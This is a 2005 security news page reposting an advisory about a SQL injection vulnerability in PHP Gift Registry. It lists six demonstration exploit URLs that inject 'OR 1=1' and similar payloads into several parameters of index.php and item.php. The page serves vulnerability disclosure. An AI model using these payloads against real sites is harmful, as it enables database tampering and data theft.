Previous articleBack to news listNext article
|
Sponsored links |
Want to become one of our authors and see your work published on ALLSeek.iNFO ?
|
| PHP Gift Registry Parameter Input Validation Hole Lets Remote Users Inject SQL Commands |
|---|
Categorie: Vulnerability
Posted: 2005-01-18 by ReCall
Views: 348
Source: Click here
| Current Rating: Not rated
|
|
| Details |
|---|
Description: Madelman reported an input validation vulnerability in PHP Gift Registry (phpGiftReq). A remote user can inject SQL commands.
The script does not properly validate user-supplied input. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.
Some demonstration exploit URLs are provided:
http://[target]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1
http://[target ]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1
http://[target]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1
http://[target]/phpgiftreg/i ndex.php?action=request&shopfor=3%2c0%29%2c%2899%2c100
http://[target]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1
http://[target]/phpgiftreg/item.php ?action=delete&itemid=3%20OR%201%3d1
Other parameters and functions may also be affected.
Impact: A remote user can execute SQL commands on the underlying database.
Solution: No solution was available at the time of this entry.
|
| Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1298
|
| User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
|
Previous articleBack to news listNext article
|
